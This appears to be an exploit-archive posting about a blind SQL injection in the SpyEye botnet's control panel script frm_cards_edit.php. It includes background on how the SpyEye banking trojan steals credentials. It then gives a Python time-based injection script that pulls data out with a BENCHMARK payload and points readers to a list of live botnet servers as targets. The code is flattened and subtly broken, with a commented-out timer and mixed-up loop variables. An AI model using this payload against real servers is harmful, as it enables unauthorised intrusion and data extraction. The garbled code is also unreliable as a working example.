Blind SQL injection Vulnerability Discovered in SpyEye Botnet by S4(uR4 ( r00tw0rm.com )
Exploit :
Vulnn type : Blind SQL injection
vuln script : frm_cards_edit.php
Affected version : ALL
May use any botnet from : https://spyeyetracker.abuse.ch/monitor.php
What is SpyEye ?
W32/SpyEye
Aliases : This is a list of aliases for the variant of SpyEye discovered in early February 2011 that has been actively targeting Norwegian banking websites:
Trojan-Spy.Win32.SpyEyes.evg (Kaspersky)
PWS-Spyeye.m (McAfee)
Trojan:Win32/EyeStye.H (Microsoft)
A variant of Win32/Spy.SpyEye.CA (NOD32)
W32/Malware.QOOC (Norman)
Trojan.Zbot (Symantec)
Mal_Xed-24 (Trend Micro)
Brief overview
SpyEye is a trojan with backdoor capabilities that attempts to steal sensitive information related to online banking and credit card transactions from an infected machine. SpyEye is sold via its author in an easy to configure kit form, which contains the trojan executable itself, command and control (C&C) server and basic configuration for targeting banking websites. As of the beginning of 2011, SpyEye has merged functionality from the ZeuS trojan family, which has been sold to the SpyEye author, and is now becoming more sophisticated with respect to the features and functionality offered.
SpyEye can potentially utilise a number of techniques in order to obtain a users online banking credentials, typically employing a phishing-style attack by presenting a faked logon web page, which is usually based on the original logon page from the bank, but that has additional HTML form fields and JavaScript inserted within, in order to obtain logon credentials that are not normally part of the logon process, such as PIN/TAN codes. A copy of the HTTP POST request is sent to the SpyEye C&C server, from which an attacker can extract the banking credentials or credit card details, and start conducting their own fraudulent transactions.
Download Exploit
Exploit Preview :
Example:
Spyeye_r0073r
"""
if len(argv)<=3: exit() else: print "[+]Started pwn..." host = argv[1] path = argv[2] sql = argv[3] port = 80 hash = "" full = [] for k in range(48,122): full.append(k) full.append(0) # full value [48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 0] # This is the charset to try delay = 0.5 a=1 while a <= 32: for i in full: j = 0 if i == 0: exit('\n[+]Finished\n') # start = time() # start time for the delay conn = HTTPConnection(host,port) #values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((4.0.5),a,1)),0)="K"),BENCHMARK(9000000,SHA1(1)),1));-- /*" } values = { "id" : "1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((" + sql + ")," + str(j) + ",1)),0)=" + str(i) + "),BENCHMARK(9000000,SHA1(1)),1));-- /*" } data = urllib.urlencode(values) print data conn.request("GET", path + "frm_cards_edit.php?" + data ) response = conn.getresponse() read = response.read() print read if response.status == 404: exit('[+]404') #404 now = time() if now - start > delay:
#has come true then the character is valid
stdout.write(chr(i))
stdout.flush()
hash += chr(i)
a += 1
break;
else: j += 1
print "i vale %s, y J vale %s" %(i,j)